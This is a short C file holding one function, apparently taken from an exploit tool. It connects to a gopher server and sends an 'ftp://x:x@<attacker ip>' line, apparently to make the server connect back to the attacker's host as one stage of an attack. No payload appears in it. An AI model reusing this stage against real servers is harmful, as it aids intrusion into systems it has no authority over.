
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;




typedef struct TYPE_2__ TYPE_1__ ;


struct TYPE_2__ {int s_addr; } ;
struct sockaddr_in {TYPE_1__ sin_addr; int sin_port; int sin_family; } ;
struct sockaddr {int dummy; } ;
struct hostent {scalar_t__ h_addr; } ;
typedef int s ;


 int AF_INET ;
 int IPPROTO_TCP ;
 int SIGALRM ;
 int SOCK_STREAM ;
 int TIMEOUT ;
 int alarm (int ) ;
 scalar_t__ connect (int,struct sockaddr*,int) ;
 int dprintf (int,char*,char*) ;
 struct hostent* gethostbyname (char*) ;
 int htons (unsigned short) ;
 int inet_addr (char*) ;
 int memcpy (char*,char*,int) ;
 int printe (char*,int) ;
 int printf (char*,char*,...) ;
 int sig_alarm ;
 int signal (int ,int ) ;
 int sleep (int) ;
 int socket (int ,int ,int ) ;

void gopher_connect(char *hostname,unsigned short port,
char *myip){
 int sock;
 struct hostent *t;
 struct sockaddr_in s;
 printf("[*] attempting to connect: %s:%d.\n",hostname,port);
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 s.sin_family=AF_INET;
 s.sin_port=htons(port);
 if((s.sin_addr.s_addr=inet_addr(hostname))){
  if(!(t=gethostbyname(hostname)))
   printe("couldn't resolve gopher hostname.",1);
  memcpy((char*)&s.sin_addr,(char*)t->h_addr,
  sizeof(s.sin_addr));
 }
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
  printe("gopher connection failed.",1);
 alarm(0);
 printf("[*] connected successfully: %s:%d.\n",hostname,port);
 printf("[?] +GOPHERD: \"ftp://x:x@%s\".\n",myip);
 sleep(1);
 dprintf(sock,"ftp://x:x@%s\n",myip);
 sleep(1);

 return;
}
